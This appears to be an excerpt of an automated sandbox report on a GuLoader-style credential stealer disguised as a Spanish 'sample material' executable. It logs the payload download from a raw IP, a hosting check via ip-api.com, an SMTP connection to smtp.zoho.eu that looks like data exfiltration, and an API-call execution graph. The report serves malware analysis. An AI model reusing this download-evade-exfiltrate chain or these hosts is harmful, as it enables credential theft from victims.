                                              Sep 12, 2024 21:30:08.489228010 CEST49717587192.168.11.20185.230.214.164
                                              Sep 12, 2024 21:30:08.804244041 CEST58749717185.230.214.164192.168.11.20
                                              Sep 12, 2024 21:30:08.804582119 CEST49717587192.168.11.20185.230.214.164
                                              Sep 12, 2024 21:30:09.117084026 CEST58749717185.230.214.164192.168.11.20
                                              Sep 12, 2024 21:30:09.213543892 CEST58749717185.230.214.164192.168.11.20
                                              Sep 12, 2024 21:30:09.213613033 CEST58749717185.230.214.164192.168.11.20
                                              Sep 12, 2024 21:30:09.213628054 CEST58749717185.230.214.164192.168.11.20
                                              Sep 12, 2024 21:30:09.213753939 CEST49717587192.168.11.20185.230.214.164
                                              Sep 12, 2024 21:30:09.213844061 CEST49717587192.168.11.20185.230.214.164
                                              Sep 12, 2024 21:30:09.522736073 CEST58749717185.230.214.164192.168.11.20
                                              Sep 12, 2024 21:30:09.523062944 CEST58749717185.230.214.164192.168.11.20
                                              Sep 12, 2024 21:30:09.562432051 CEST49717587192.168.11.20185.230.214.164
                                              Sep 12, 2024 21:30:09.873348951 CEST58749717185.230.214.164192.168.11.20
                                              Sep 12, 2024 21:30:09.873373032 CEST58749717185.230.214.164192.168.11.20
                                              Sep 12, 2024 21:30:09.873389006 CEST58749717185.230.214.164192.168.11.20
                                              Sep 12, 2024 21:30:09.873617887 CEST49717587192.168.11.20185.230.214.164
                                              Sep 12, 2024 21:30:09.876024008 CEST49717587192.168.11.20185.230.214.164
                                              Sep 12, 2024 21:30:10.185568094 CEST58749717185.230.214.164192.168.11.20
                                              Sep 12, 2024 21:30:10.234848976 CEST49717587192.168.11.20185.230.214.164
                                              Sep 12, 2024 21:30:10.330549002 CEST49717587192.168.11.20185.230.214.164
                                              Sep 12, 2024 21:30:10.640171051 CEST58749717185.230.214.164192.168.11.20
                                              Sep 12, 2024 21:30:10.640201092 CEST58749717185.230.214.164192.168.11.20
                                              Sep 12, 2024 21:30:10.640316963 CEST49717587192.168.11.20185.230.214.164
                                              Sep 12, 2024 21:30:10.640409946 CEST58749717185.230.214.164192.168.11.20
                                              Sep 12, 2024 21:30:10.641071081 CEST49717587192.168.11.20185.230.214.164
                                              Sep 12, 2024 21:30:10.953310013 CEST58749717185.230.214.164192.168.11.20
                                              Sep 12, 2024 21:30:10.953783035 CEST49717587192.168.11.20185.230.214.164
                                              Sep 12, 2024 21:30:11.302799940 CEST58749717185.230.214.164192.168.11.20
                                              Sep 12, 2024 21:30:11.344832897 CEST58749717185.230.214.164192.168.11.20
                                              Sep 12, 2024 21:30:11.345206976 CEST49717587192.168.11.20185.230.214.164
                                              Sep 12, 2024 21:30:11.654546976 CEST58749717185.230.214.164192.168.11.20
                                              Sep 12, 2024 21:30:11.655070066 CEST58749717185.230.214.164192.168.11.20
                                              Sep 12, 2024 21:30:11.655412912 CEST49717587192.168.11.20185.230.214.164
                                              Sep 12, 2024 21:30:11.964987040 CEST58749717185.230.214.164192.168.11.20
                                              Sep 12, 2024 21:30:11.965281010 CEST49717587192.168.11.20185.230.214.164
                                              Sep 12, 2024 21:30:12.274482965 CEST58749717185.230.214.164192.168.11.20
                                              Sep 12, 2024 21:30:12.315538883 CEST49717587192.168.11.20185.230.214.164
                                              Sep 12, 2024 21:30:12.315637112 CEST49717587192.168.11.20185.230.214.164
                                              Sep 12, 2024 21:30:12.315685034 CEST49717587192.168.11.20185.230.214.164
                                              Sep 12, 2024 21:30:12.315732956 CEST49717587192.168.11.20185.230.214.164
                                              Sep 12, 2024 21:30:12.315789938 CEST49717587192.168.11.20185.230.214.164
                                              Sep 12, 2024 21:30:12.315789938 CEST49717587192.168.11.20185.230.214.164
                                              Sep 12, 2024 21:30:12.315898895 CEST49717587192.168.11.20185.230.214.164
                                              Sep 12, 2024 21:30:12.315927982 CEST49717587192.168.11.20185.230.214.164
                                              Sep 12, 2024 21:30:12.315927982 CEST49717587192.168.11.20185.230.214.164
                                              Sep 12, 2024 21:30:12.315927982 CEST49717587192.168.11.20185.230.214.164
                                              Sep 12, 2024 21:30:12.315978050 CEST49717587192.168.11.20185.230.214.164
                                              Sep 12, 2024 21:30:12.624821901 CEST58749717185.230.214.164192.168.11.20
                                              Sep 12, 2024 21:30:12.625217915 CEST58749717185.230.214.164192.168.11.20
                                              Sep 12, 2024 21:30:12.625482082 CEST58749717185.230.214.164192.168.11.20
                                              Sep 12, 2024 21:30:12.625646114 CEST58749717185.230.214.164192.168.11.20
                                              Sep 12, 2024 21:30:12.625689030 CEST58749717185.230.214.164192.168.11.20
                                              Sep 12, 2024 21:30:12.625890017 CEST58749717185.230.214.164192.168.11.20
                                              Sep 12, 2024 21:30:12.831882000 CEST58749717185.230.214.164192.168.11.20
                                              Sep 12, 2024 21:30:12.875011921 CEST49717587192.168.11.20185.230.214.164
                                              Sep 12, 2024 21:30:14.077581882 CEST804971645.125.247.123192.168.11.20
                                              Sep 12, 2024 21:30:14.077902079 CEST4971680192.168.11.2045.125.247.123
                                              Sep 12, 2024 21:31:44.074031115 CEST4971680192.168.11.2045.125.247.123
                                              Sep 12, 2024 21:31:44.870285034 CEST4971680192.168.11.2045.125.247.123
                                              Sep 12, 2024 21:31:46.463710070 CEST4971680192.168.11.2045.125.247.123
                                              Sep 12, 2024 21:31:48.010276079 CEST49717587192.168.11.20185.230.214.164
                                              Sep 12, 2024 21:31:48.213393927 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:31:48.327305079 CEST58749717185.230.214.164192.168.11.20
                                              Sep 12, 2024 21:31:48.327390909 CEST58749717185.230.214.164192.168.11.20
                                              Sep 12, 2024 21:31:48.327455997 CEST58749717185.230.214.164192.168.11.20
                                              Sep 12, 2024 21:31:48.327596903 CEST49717587192.168.11.20185.230.214.164
                                              Sep 12, 2024 21:31:48.327665091 CEST49717587192.168.11.20185.230.214.164
                                              Sep 12, 2024 21:31:48.447808027 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:31:48.447982073 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:31:48.463381052 CEST49717587192.168.11.20185.230.214.164
                                              Sep 12, 2024 21:31:49.650446892 CEST4971680192.168.11.2045.125.247.123
                                              Sep 12, 2024 21:31:56.023983002 CEST4971680192.168.11.2045.125.247.123
                                              Sep 12, 2024 21:32:08.755656958 CEST4971680192.168.11.2045.125.247.123
                                              Sep 12, 2024 21:32:34.203138113 CEST4971680192.168.11.2045.125.247.123
                                              TimestampSource PortDest PortSource IPDest IP
                                              Sep 12, 2024 21:30:03.252435923 CEST4943353192.168.11.201.1.1.1
                                              Sep 12, 2024 21:30:03.417937040 CEST53494331.1.1.1192.168.11.20
                                              Sep 12, 2024 21:30:08.000008106 CEST5552853192.168.11.201.1.1.1
                                              Sep 12, 2024 21:30:08.174037933 CEST53555281.1.1.1192.168.11.20
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Sep 12, 2024 21:30:03.252435923 CEST192.168.11.201.1.1.10xf84aStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                              Sep 12, 2024 21:30:08.000008106 CEST192.168.11.201.1.1.10x7017Standard query (0)smtp.zoho.euA (IP address)IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Sep 12, 2024 21:30:03.417937040 CEST1.1.1.1192.168.11.200xf84aNo error (0)ip-api.com45.125.247.123A (IP address)IN (0x0001)false
                                              Sep 12, 2024 21:30:08.174037933 CEST1.1.1.1192.168.11.200x7017No error (0)smtp.zoho.eu185.230.214.164A (IP address)IN (0x0001)false
                                              • 107.150.18.109
                                              • ip-api.com
                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.11.2049715107.150.18.109806816C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 12, 2024 21:29:58.454361916 CEST182OUTGET /vqdVIxqzrFAaCMWDM41.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                              Host: 107.150.18.109
                                              Cache-Control: no-cache
                                              Sep 12, 2024 21:29:58.677325964 CEST1289INHTTP/1.1 200 OK
                                              Content-Type: application/octet-stream
                                              Last-Modified: Wed, 04 Sep 2024 10:50:19 GMT
                                              Accept-Ranges: bytes
                                              ETag: "ab32b73bb8feda1:0"
                                              Server: Microsoft-IIS/8.5
                                              Date: Thu, 12 Sep 2024 19:29:58 GMT
                                              Content-Length: 250944
                                              Data Raw: e4 6e 94 0d 62 23 d2 53 43 84 ef 9f 67 67 ad fb 3c 92 86 6d c8 f8 37 3d 17 86 89 3a f1 06 f0 82 2f 39 e6 71 99 c4 c8 13 68 cc 85 52 0f 29 a5 fc ee 07 2f 4f fc d4 29 2d 6b eb 46 38 ad 73 b4 2b 61 b1 90 15 e2 36 72 45 08 44 7e c7 fc 6a ff 87 11 5e e3 79 99 f7 40 27 d9 f3 88 ed 64 5f 78 9e 75 c7 4c ec 7f c0 dc 84 43 1b ea 8f d7 ff 2b f6 13 e8 81 b8 07 0e 40 48 8a d9 ae 36 f5 31 f9 00 12 ec d1 02 5b 94 88 eb ab 78 4e cd 2f 30 c7 7d 93 be 4b ec 20 7f e3 25 bc 7e 15 cd 68 ab 06 2d a3 4a 87 2d ae f3 84 db 76 04 81 c5 6d fd c6 8e 4c 0b a0 45 a5 f4 1d 0a 1e 40 84 c1 06 5d 97 66 ae 9f d3 42 2d 0f ad 0c 20 84 51 8b 8a 8e 1d 97 7b 3f 4c c1 ec 82 f2 23 ad af e3 9c a2 ae 7a 55 84 46 33 80 dd 53 1a 7c 19 2a 7f aa 8c d5 0c af dd 52 89 ce 7f ee b3 19 25 f9 c7 49 3f 9c 29 b7 ba cf 09 b6 f3 03 62 a0 8d a5 69 48 cb 2a 2b 44 03 49 ff 05 f2 78 36 8c c2 06 99 5a 44 f6 93 fa 96 df 29 b4 a2 57 28 ce 4a 85 ac a7 9d 5b e6 16 5e 7d 3c 0d ce 18 c6 ff 81 4d 2f 42 47 11 72 cb a3 38 71 de 6f 52 1c 19 5e be d5 73 12 bb 74 b2 d8 2a [TRUNCATED]
                                              Data Ascii: nb#SCgg<m7=:/9qhR)/O)-kF8s+a6rED~j^y@'d_xuLC+@H61[xN/0}K %~h-J-vmLE@]fB- Q{?L#zUF3S|*R%I?)biH*+DIx6ZD)W(J[^}<M/BGr8qoR^st*quXk<!0i&BU?)0R#+cy$"^i"*AUq^U#`7,rnVpZ{(Y1b2?KbvYQRoS$}Ltl~"DB(`a'4KwUGR>JGnz`n7VYlvGMMMticB~#L=2lbHjMmKxVwP&Dwe p7`)YVi a9yrz>zBJiV0hxz(JTv#K$w2&gyyLB7%|K-&X@t@YfyJCcfsue<&EkiqGZ#*r)LnZgR<Q$0{yZh`~a65?Y*cxwtf#uQQ5gJu{j>&}Ba03j(v<wFY.T/bdlGzBd-C#,N[)eE4 nQN.dS+u"Joe#llP8ve [TRUNCATED]
                                              Sep 12, 2024 21:29:58.677340031 CEST1289INData Raw: 16 9c 02 10 39 ce 04 5a 54 62 21 53 ab 8a 60 62 76 96 ea 76 f3 2a 3d 52 ad 83 17 91 66 21 17 8b b2 9b eb c9 08 53 59 3f e7 5a cd dc 69 0c b6 2d 9b 08 f4 d6 0d 8f ce 94 fa ec ae a7 8a 76 e6 50 7f 6a 93 50 51 a8 fb d8 0e 4e 42 a3 e7 7d de 6e 5d 66
                                              Data Ascii: 9ZTb!S`bvv*=Rf!SY?Zi-vPjPQNB}n]fu\9 &n]FY'*yc(Z"F|"9'C@NG{4cg<H05NB:A2^:/w&W(N{td#?@ /v
                                              Sep 12, 2024 21:29:58.677351952 CEST1289INData Raw: 19 9a 84 7b 8c d9 e5 72 51 37 02 a1 23 16 32 3a 23 91 40 42 0d 44 81 83 16 6c aa 10 38 ce 82 8f 4a e0 5a 33 ab 0a e4 c8 54 c1 87 6a 0e 46 58 76 f3 a6 35 cb 10 52 78 ed c6 8c 7e a8 5c 77 21 1a 96 28 a4 8e 77 0e cd 8d 9b 08 f1 fe 2c 89 cb e1 52 ec
                                              Data Ascii: {rQ7#2:#@BDl8JZ3TjFXv5Rx~\w!(w,R"PjPyX7>nTmDAuXI, qFS5S*$}n{*x!E&q x0%u|^d4_^f!?r/;k|\hE:aEf
                                              Sep 12, 2024 21:29:58.677447081 CEST1289INData Raw: a7 e8 e2 98 51 bd 50 32 34 77 69 11 54 d4 bc 89 67 b9 92 40 36 2f 60 ff 19 9a 84 7b 8c d9 e5 72 28 37 02 a1 23 42 32 69 d8 91 40 4c 25 14 18 a5 6b f4 82 10 3d e4 9a a7 2f 0b 21 ac af 20 c2 e0 75 be 6d 17 91 42 72 6c db 97 dd e3 03 56 52 c5 c6 fd
                                              Data Ascii: QP24wiTg@6/`{r(7#B2i@L%k=/! umBrlVRk\5*i/@xl`r+sF]GlwZK$Yl'Wr({u,~^fC<@_|"AaK`@&sgQ6.D0;X2v58
                                              Sep 12, 2024 21:29:58.901473045 CEST1289INData Raw: c7 e5 54 ec 61 eb 54 d1 7a 01 1f f0 06 32 96 b1 62 20 d5 0e 69 91 6b 27 f5 ec c8 80 d3 c4 8f 32 30 53 4b 33 56 d7 3f 58 67 b9 96 94 24 2d 1b 38 12 9a 80 51 50 da df 1c cf 37 02 db 0a 5c 30 16 5f cf 40 48 09 16 16 a6 16 1c 7c 1e 39 ce 84 5b 58 e2
                                              Data Ascii: TaTz2b ik'20SK3V?Xg$-8QP7\0_@H|9[X!FX7Qx\(Zeh~LiZ{NQmo_Ltac Yn_Sz*}0I*\hE"J7taz@JTt}gu
                                              Sep 12, 2024 21:29:58.901489019 CEST1289INData Raw: ed 06 41 41 8d 8d fa c5 46 97 e8 eb c1 e8 42 dd 85 ac 64 36 49 87 d0 5f c7 e5 a0 ca 7d eb 54 25 62 21 1f d0 01 32 be 80 9e 21 ea e3 65 90 6b 3b 8c ec c8 8c 75 38 83 32 34 1c 6f 33 56 dd bf 44 67 b9 92 53 38 2d 1b 18 31 92 80 51 a8 06 e0 0f cf 37
                                              Data Ascii: AAFBd6I_}T%b!2!ek;u824o3VDgS8-1Q7$x\0\H4x$)T!/mp]hvA6Wx\(:i-e.hxZqnE]m `YLy^Cs![FR/sX*p*\g|";UxgBk
                                              Sep 12, 2024 21:29:58.901499987 CEST1289INData Raw: 07 7a 3f 01 c3 53 9d 86 a0 0b 6d 3e d5 23 cd b1 a8 5c 4a e5 96 d0 79 29 ed f8 40 0a 2d 8d fa b5 90 90 e9 eb e7 c9 4b dd 85 8a 9b 3a 48 87 97 54 c5 e5 ac 40 41 e7 54 2f 76 ff 11 d3 01 32 68 bd 9f 21 cc 1d 69 91 6b aa a6 d5 c2 86 53 c6 8f 12 35 73
                                              Data Ascii: z?Sm>#\Jy)@-K:HT@AT/v2h!ikS5sC3VgGi(~P\n6`^!:FXc7v\+m-ebhxZNFnnUHc5 nSS*}p
                                              Sep 12, 2024 21:29:58.901510954 CEST1289INData Raw: 0b 04 87 06 dd 8b ab 5f 3e 88 28 b9 09 59 57 fa 2e 61 82 83 b0 f5 62 84 2f 58 3d ff c4 c8 b7 88 a0 0b 6d e0 da 20 cd b1 a8 5e 48 e5 b6 25 75 28 ed 26 46 33 30 8d 04 b4 57 99 e8 eb c7 f8 4e dd 85 aa a2 ec b6 78 40 88 cb e5 aa ca 41 eb 54 25 5c 01
                                              Data Ascii: _>(YW.ab/X=m ^H%u(&F30WNx@AT%\11!izt2)B3V?Zgl(-Q7M]0@H|9T!R3v2F^7#Zx\(i1'h|LhZ{NQmm_Ltac l
                                              Sep 12, 2024 21:29:58.901520967 CEST1289INData Raw: 6a 5a 8e 1b 3a 12 95 bb ff dc dc 0a 91 9e 06 6a 37 87 c5 97 86 b2 60 ff 0b 04 51 3d d1 8b a1 03 12 81 28 99 11 a7 59 fb d0 60 45 af b1 f5 42 7a 23 5c 3d d1 cd f1 bd 89 88 34 6d c0 d1 08 8d b1 56 5a b7 eb b6 db 59 30 ed 06 41 cd 3e 81 fa b5 90 90
                                              Data Ascii: jZ:j7`Q=(Y`EBz#\=4mVZY0A>KT^v9T/|!ekD2rz=Vnsj5d]7"\01[H6V9)!UVV~RX]>(mjHxljm[BK
                                              Sep 12, 2024 21:29:58.901531935 CEST1289INData Raw: f1 ff 02 ce 35 86 de c7 76 04 75 7b f2 14 4a 30 ce 58 e5 e6 7d 50 42 61 6a 5a 83 1b 3a 07 95 bb ff dc dc 0a 95 9e 06 6a 0f 2c c0 97 86 92 88 f1 0a 04 af cd d1 8a a1 dd 1f 8d 28 b9 f7 a6 60 fe 2e 61 7c b7 b4 f5 42 84 17 92 c2 fe 3a d9 ec 88 a0 01
                                              Data Ascii: 5vu{J0X}PBajZ:j,(`.a|B:E ^Iky) a30K`6K{:bva/y!ikTSq<4s{LVVj/dhe/c0:h690T O9rR~|iH!
                                              Sep 12, 2024 21:29:58.901542902 CEST1289INData Raw: 81 99 9c 00 d2 d0 0a 9b 5b 90 67 1a b9 ee 9e 82 94 67 0c 75 51 1a fa ca f1 93 02 30 3b 8a de c7 99 28 71 7b d2 13 b4 3e cf a6 dc ee 6c 50 42 61 6a 5a 80 1b e4 09 95 bb df 2a dd 33 9f 60 08 6e 0f 0c 3f 9b 82 92 56 fa 0b 04 af cd dc b2 b9 fd 1e 8d
                                              Data Ascii: [gguQ0;(q{>lPBajZ*3`n?Vy.a|Bx;Cm>$TPIH@1A<nO9HP/V!IkTaSq<6sc1Vij!9Q%67P2@HD~l 0<%vFs7


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.11.204971645.125.247.123806816C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 12, 2024 21:30:03.764331102 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                              Host: ip-api.com
                                              Connection: Keep-Alive
                                              Sep 12, 2024 21:30:04.076824903 CEST175INHTTP/1.1 200 OK
                                              Date: Thu, 12 Sep 2024 19:30:03 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Content-Length: 6
                                              Access-Control-Allow-Origin: *
                                              X-Ttl: 60
                                              X-Rl: 44
                                              Data Raw: 66 61 6c 73 65 0a
                                              Data Ascii: false


                                              TimestampSource PortDest PortSource IPDest IPCommands
                                              Sep 12, 2024 21:30:08.804244041 CEST58749717185.230.214.164192.168.11.20220 mx.zoho.eu SMTP Server ready September 12, 2024 9:30:08 PM CEST
                                              Sep 12, 2024 21:30:08.804582119 CEST49717587192.168.11.20185.230.214.164EHLO 414408
                                              Sep 12, 2024 21:30:09.213543892 CEST58749717185.230.214.164192.168.11.20250-mx.zoho.eu Hello 414408 (102.129.252.154 (102.129.252.154))
                                              Sep 12, 2024 21:30:09.213613033 CEST58749717185.230.214.164192.168.11.20250-STARTTLS
                                              Sep 12, 2024 21:30:09.213628054 CEST58749717185.230.214.164192.168.11.20250 SIZE 53477376
                                              Sep 12, 2024 21:30:09.213844061 CEST49717587192.168.11.20185.230.214.164STARTTLS
                                              Sep 12, 2024 21:30:09.523062944 CEST58749717185.230.214.164192.168.11.20220 Ready to start TLS.

                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Click to jump to process

                                              Target ID:0
                                              Start time:15:29:09
                                              Start date:12/09/2024
                                              Path:C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe"
                                              Imagebase:0x400000
                                              File size:620'120 bytes
                                              MD5 hash:C6C117C18FEAD29FB0E5393139D0B0F2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2974737603.00000000075B2000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              Target ID:3
                                              Start time:15:29:43
                                              Start date:12/09/2024
                                              Path:C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe"
                                              Imagebase:0x400000
                                              File size:620'120 bytes
                                              MD5 hash:C6C117C18FEAD29FB0E5393139D0B0F2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.7577422376.0000000035D65000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:false

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:23.4%
                                                Dynamic/Decrypted Code Coverage:13.5%
                                                Signature Coverage:19.3%
                                                Total number of Nodes:1565
                                                Total number of Limit Nodes:45
                                                execution_graph 5191 10001000 5194 1000101b 5191->5194 5201 10001516 5194->5201 5196 10001020 5197 10001024 5196->5197 5198 10001027 GlobalAlloc 5196->5198 5199 1000153d 3 API calls 5197->5199 5198->5197 5200 10001019 5199->5200 5202 1000151c 5201->5202 5203 10001522 5202->5203 5204 1000152e GlobalFree 5202->5204 5203->5196 5204->5196 4026 401941 4027 401943 4026->4027 4032 402c53 4027->4032 4033 402c5f 4032->4033 4074 406234 4033->4074 4036 401948 4038 405a03 4036->4038 4113 405cce 4038->4113 4041 405a42 4047 405b62 4041->4047 4127 406212 lstrcpynW 4041->4127 4042 405a2b DeleteFileW 4070 401951 4042->4070 4044 405a68 4045 405a7b 4044->4045 4046 405a6e lstrcatW 4044->4046 4128 405c12 lstrlenW 4045->4128 4048 405a81 4046->4048 4047->4070 4156 406555 FindFirstFileW 4047->4156 4051 405a91 lstrcatW 4048->4051 4053 405a9c lstrlenW FindFirstFileW 4048->4053 4051->4053 4053->4047 4072 405abe 4053->4072 4056 405b45 FindNextFileW 4060 405b5b FindClose 4056->4060 4056->4072 4057 4059bb 5 API calls 4059 405b9d 4057->4059 4061 405ba1 4059->4061 4062 405bb7 4059->4062 4060->4047 4065 405371 25 API calls 4061->4065 4061->4070 4064 405371 25 API calls 4062->4064 4064->4070 4067 405bae 4065->4067 4066 405a03 62 API calls 4066->4072 4069 4060b3 38 API calls 4067->4069 4068 405371 25 API calls 4068->4056 4069->4070 4072->4056 4072->4066 4072->4068 4132 406212 lstrcpynW 4072->4132 4133 4059bb 4072->4133 4141 405371 4072->4141 4152 4060b3 MoveFileExW 4072->4152 4088 406241 4074->4088 4075 402c80 4075->4036 4092 4064a6 4075->4092 4076 40648c 4076->4075 4108 406212 lstrcpynW 4076->4108 4078 4062f4 GetVersion 4078->4088 4079 40645a lstrlenW 4079->4088 4082 406234 10 API calls 4082->4079 4083 40636f GetSystemDirectoryW 4083->4088 4085 406382 GetWindowsDirectoryW 4085->4088 4086 4064a6 5 API calls 4086->4088 4087 4063b6 SHGetSpecialFolderLocation 4087->4088 4091 4063ce SHGetPathFromIDListW CoTaskMemFree 4087->4091 4088->4076 4088->4078 4088->4079 4088->4082 4088->4083 4088->4085 4088->4086 4088->4087 4089 406234 10 API calls 4088->4089 4090 4063fb lstrcatW 4088->4090 4101 4060df RegOpenKeyExW 4088->4101 4106 406159 wsprintfW 4088->4106 4107 406212 lstrcpynW 4088->4107 4089->4088 4090->4088 4091->4088 4095 4064b3 4092->4095 4093 406529 4094 40652e CharPrevW 4093->4094 4097 40654f 4093->4097 4094->4093 4095->4093 4096 40651c CharNextW 4095->4096 4099 406508 CharNextW 4095->4099 4100 406517 CharNextW 4095->4100 4109 405bf3 4095->4109 4096->4093 4096->4095 4097->4036 4099->4095 4100->4096 4102 406153 4101->4102 4103 406113 RegQueryValueExW 4101->4103 4102->4088 4104 406134 RegCloseKey 4103->4104 4104->4102 4106->4088 4107->4088 4108->4075 4110 405bf9 4109->4110 4111 405c0f 4110->4111 4112 405c00 CharNextW 4110->4112 4111->4095 4112->4110 4162 406212 lstrcpynW 4113->4162 4115 405cdf 4163 405c71 CharNextW CharNextW 4115->4163 4118 405a23 4118->4041 4118->4042 4119 4064a6 5 API calls 4120 405cf5 4119->4120 4120->4118 4121 405d26 lstrlenW 4120->4121 4123 406555 2 API calls 4120->4123 4126 405c12 2 API calls 4120->4126 4121->4120 4122 405d31 4121->4122 4124 405bc6 3 API calls 4122->4124 4123->4120 4125 405d36 GetFileAttributesW 4124->4125 4125->4118 4126->4121 4127->4044 4129 405c20 4128->4129 4130 405c32 4129->4130 4131 405c26 CharPrevW 4129->4131 4130->4048 4131->4129 4131->4130 4132->4072 4169 405dc2 GetFileAttributesW 4133->4169 4136 4059e8 4136->4072 4137 4059d6 RemoveDirectoryW 4139 4059e4 4137->4139 4138 4059de DeleteFileW 4138->4139 4139->4136 4140 4059f4 SetFileAttributesW 4139->4140 4140->4136 4142 40538c 4141->4142 4151 40542e 4141->4151 4143 4053a8 lstrlenW 4142->4143 4144 406234 18 API calls 4142->4144 4145 4053d1 4143->4145 4146 4053b6 lstrlenW 4143->4146 4144->4143 4148 4053e4 4145->4148 4149 4053d7 SetWindowTextW 4145->4149 4147 4053c8 lstrcatW 4146->4147 4146->4151 4147->4145 4150 4053ea SendMessageW SendMessageW SendMessageW 4148->4150 4148->4151 4149->4148 4150->4151 4151->4072 4153 4060d4 4152->4153 4154 4060c7 4152->4154 4153->4072 4172 405f41 lstrcpyW 4154->4172 4157 405b87 4156->4157 4158 40656b FindClose 4156->4158 4157->4070 4159 405bc6 lstrlenW CharPrevW 4157->4159 4158->4157 4160 405be2 lstrcatW 4159->4160 4161 405b91 4159->4161 4160->4161 4161->4057 4162->4115 4164 405c8e 4163->4164 4167 405ca0 4163->4167 4166 405c9b CharNextW 4164->4166 4164->4167 4165 405cc4 4165->4118 4165->4119 4166->4165 4167->4165 4168 405bf3 CharNextW 4167->4168 4168->4167 4170 4059c7 4169->4170 4171 405dd4 SetFileAttributesW 4169->4171 4170->4136 4170->4137 4170->4138 4171->4170 4173 405f69 4172->4173 4174 405f8f GetShortPathNameW 4172->4174 4199 405de7 GetFileAttributesW CreateFileW 4173->4199 4176 405fa4 4174->4176 4177 4060ae 4174->4177 4176->4177 4179 405fac wsprintfA 4176->4179 4177->4153 4178 405f73 CloseHandle GetShortPathNameW 4178->4177 4180 405f87 4178->4180 4181 406234 18 API calls 4179->4181 4180->4174 4180->4177 4182 405fd4 4181->4182 4200 405de7 GetFileAttributesW CreateFileW 4182->4200 4184 405fe1 4184->4177 4185 405ff0 GetFileSize GlobalAlloc 4184->4185 4186 406012 4185->4186 4187 4060a7 CloseHandle 4185->4187 4201 405e6a ReadFile 4186->4201 4187->4177 4192 406031 lstrcpyA 4194 406053 4192->4194 4193 406045 4195 405d4c 4 API calls 4193->4195 4196 40608a SetFilePointer 4194->4196 4195->4194 4208 405e99 WriteFile 4196->4208 4199->4178 4200->4184 4202 405e88 4201->4202 4202->4187 4203 405d4c lstrlenA 4202->4203 4204 405d8d lstrlenA 4203->4204 4205 405d95 4204->4205 4206 405d66 lstrcmpiA 4204->4206 4205->4192 4205->4193 4206->4205 4207 405d84 CharNextA 4206->4207 4207->4204 4209 405eb7 GlobalFree 4208->4209 4209->4187 4210 4015c1 4211 402c53 18 API calls 4210->4211 4212 4015c8 4211->4212 4213 405c71 4 API calls 4212->4213 4225 4015d1 4213->4225 4214 401631 4215 401663 4214->4215 4216 401636 4214->4216 4220 401423 25 API calls 4215->4220 4237 401423 4216->4237 4217 405bf3 CharNextW 4217->4225 4226 40165b 4220->4226 4224 40164a SetCurrentDirectoryW 4224->4226 4225->4214 4225->4217 4227 401617 GetFileAttributesW 4225->4227 4229 4058da 4225->4229 4232 405840 CreateDirectoryW 4225->4232 4241 4058bd CreateDirectoryW 4225->4241 4227->4225 4244 4065ec GetModuleHandleA 4229->4244 4233 405891 GetLastError 4232->4233 4234 40588d 4232->4234 4233->4234 4235 4058a0 SetFileSecurityW 4233->4235 4234->4225 4235->4234 4236 4058b6 GetLastError 4235->4236 4236->4234 4238 405371 25 API calls 4237->4238 4239 401431 4238->4239 4240 406212 lstrcpynW 4239->4240 4240->4224 4242 4058d1 GetLastError 4241->4242 4243 4058cd 4241->4243 4242->4243 4243->4225 4245 406612 GetProcAddress 4244->4245 4246 406608 4244->4246 4248 4058e1 4245->4248 4250 40657c GetSystemDirectoryW 4246->4250 4248->4225 4249 40660e 4249->4245 4249->4248 4251 40659e wsprintfW LoadLibraryExW 4250->4251 4251->4249 4253 401e43 4261 402c31 4253->4261 4255 401e49 4256 402c31 18 API calls 4255->4256 4257 401e55 4256->4257 4258 401e61 ShowWindow 4257->4258 4259 401e6c EnableWindow 4257->4259 4260 402adb 4258->4260 4259->4260 4262 406234 18 API calls 4261->4262 4263 402c46 4262->4263 4263->4255 5205 4028c3 5206 402c53 18 API calls 5205->5206 5207 4028d1 5206->5207 5208 4028e7 5207->5208 5209 402c53 18 API calls 5207->5209 5210 405dc2 2 API calls 5208->5210 5209->5208 5211 4028ed 5210->5211 5233 405de7 GetFileAttributesW CreateFileW 5211->5233 5213 4028fa 5214 402906 GlobalAlloc 5213->5214 5215 40299d 5213->5215 5218 402994 CloseHandle 5214->5218 5219 40291f 5214->5219 5216 4029a5 DeleteFileW 5215->5216 5217 4029b8 5215->5217 5216->5217 5218->5215 5234 403402 SetFilePointer 5219->5234 5221 